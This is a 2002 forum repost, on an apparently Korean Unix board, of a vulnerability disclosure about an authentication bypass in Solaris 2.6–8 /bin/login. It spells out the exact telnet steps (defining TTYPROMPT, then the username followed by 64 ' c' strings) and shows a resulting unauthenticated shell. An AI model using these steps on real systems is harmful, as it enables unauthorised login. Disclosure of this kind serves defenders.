BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: ¿±±â Solaris 2.6, 7, and 8 /bin/login has a vulnerability Á¶È¸¼ö: 5753


Hello,

Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists. The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character string,
inside telnet. I believe this overflows an integer inside login, which
specifies whether or not the user has been authenticated (just a guess).
Once connected to the remote host, you must type the username, followed by
64 " c"s, and a literal "\n". You will then be logged in as the user
without any password authentication. This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Jonathan Stuart
Network Security Engineer
Computer Consulting Partners, Ltd.
E-mail: jons@ccpartnersltd.com


°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2002/10/04 14:37 from 218.154.16.35

  SQL Query Vulnerability In PHP ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ AFD 1.2.14 local root exploit  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡